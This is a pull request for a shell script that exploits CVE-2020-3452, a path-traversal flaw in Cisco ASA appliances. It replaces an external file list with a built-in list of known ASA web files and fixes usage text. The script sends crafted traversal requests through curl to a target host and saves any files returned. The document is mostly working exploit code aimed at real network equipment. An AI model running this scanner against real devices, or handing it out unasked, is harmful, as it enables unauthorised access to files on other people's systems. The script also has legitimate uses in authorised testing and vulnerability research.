### PR TITLE
Remove external file dependency and update references

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,2 +1,10 @@
 # CVE-2020-3452-Scanner
 Just basic scanner abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of the CISCO ASA applicances.
+
+## Usage:
+By default this uses a file list constructed from sample output from the `CVE-2018-0296` in the Metasploit Framework (https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md).
+```
+Usage: cve-2020-3452.sh <target ip/hostname>
+Example: cve-2020-3452.sh mytarget.com
+Files that are downloaded will be in the newly created 'cisco_asa_files' directory
+```

--- a/cve-2020-3452.sh
+++ b/cve-2020-3452.sh
@@ -1,16 +1,16 @@
-
-FILE_LIST=cisco_asa_file_list.txt
 TARGET=$1
+CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen"
 mkdir cisco_asa_files
+
 if [ -z "$1" ];
 then
-    echo "Usage: cve-2020-3542.sh <target ip/hostname>"
-    echo "Example: cve-2020-3542.sh mytarget.com"
+    echo "Usage: cve-2020-3452.sh <target ip/hostname>"
+    echo "Example: cve-2020-3452.sh mytarget.com"
     echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory"
     echo "Target not specificed...exiting..."
 else
-    while read FILE;
+    for FILE in $CISCO_KNOWN_FILES;
     do
         curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE;
-    done<$FILE_LIST;
+    done
 fi


### PR DESCRIPTION
Just cleaning the exploit code up a bit so it's more portable. Also adding necessary references for where the default file list was obtained. Since this variant cannot abuse a directory listing, brute forcing files with a dictionary is necessary. The default includes expected files from CVE-2018-0296.